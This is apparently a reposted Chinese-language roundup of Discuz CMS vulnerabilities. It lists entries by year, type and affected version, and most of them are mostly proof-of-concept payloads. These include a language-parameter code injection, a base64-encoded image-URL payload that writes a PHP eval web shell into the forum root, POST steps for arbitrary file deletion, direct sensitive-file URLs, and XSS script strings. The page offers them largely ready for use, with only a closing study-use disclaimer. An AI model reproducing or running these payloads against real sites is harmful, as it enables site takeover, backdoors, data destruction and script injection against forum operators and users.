應用安全 - CMS - Discuz漏洞匯總


Discuz ML! V3.X 代碼注入

Date 2019 類型
代碼注入導致RCE

影響范圍 Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org

poc
_language=sc'.phpinfo().';

 

SSV-90861

Date:
2012

類型:
敏感信息泄露

影響范圍:
DZ x2.5 

POC:
http://www.xx.xx/uc_server/control/admin/db.php http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php http://www.xx.xx/install/include/install_lang.php

 

Discuz! X2.5 遠程代碼執行

Date: 2012 類型:
RCE

前置條件:1).注冊任意賬戶
(2).登陸用戶,發表blog日志(注意是日志)
(3).添加圖片,選擇網絡圖片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).訪問日志,論壇根目錄下生成demo.php,一句發密碼c

影響范圍:
v2.5

 

Discuz!X2/2.5弱口令破解漏洞

Date: 2013 類型:
登錄界面暴力破解

影響范圍:
Discuz!X2/2.5

 

ssvid-93588

Date: 2014 類型:
任意文件刪除

前置條件:
(1)登陸DZ前台
(2)請求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就會變為../../../test.txt

(3)構造請求向home.php?mod=spacecp&ac=profile&op=base上傳文件(普通圖片即可)

請求后文件被刪除


影響范圍:
version<=3.4

 

SSV-96608

Date: 2014.10 類型:
前台任意文件刪除

影響范圍:

 

SSV-89024

Date: 2015.1 類型:
Discuz X2.5 /source/class/class_image.php 命令執行漏洞

影響范圍:
Discuz X2.5 

 

Discuz! X系列遠程代碼執行漏洞

Date: 2015.8 類型:
RCE + XML反序列化

前置條件:
訪問:/api/uc.php
影響范圍:

 

SSV-91183

Date: 2016.3 類型:
SSRF
 影響范圍:
Discuz! X2 X3

POC:
http://www.internetblog.cn/archives/6068.html?mip

 

CVE-2018-14729

Date: 2018.8 類型:
遠程代碼執行
 前置條件:
登錄后台
 影響范圍:
Discuz! 1.5-2.5

 

Discuz
Discuz!X ≤3.4 任意文件刪除漏洞分析

Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站腳本漏洞。
moodwall.inc.php
發表心情處直接插入html代碼
code 區域
"><script>alert(/xss/)</script>


Discuz! X1某頁面存在XSS漏洞
簡要描述:
頁面對取到的參數沒有過濾,直接echo到了html里
詳細說明:
api/db/dbbak.php頁面,對$apptype缺少必要的過濾,調用api_msg()函數時直接將$apptype echo到了html中。
漏洞證明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM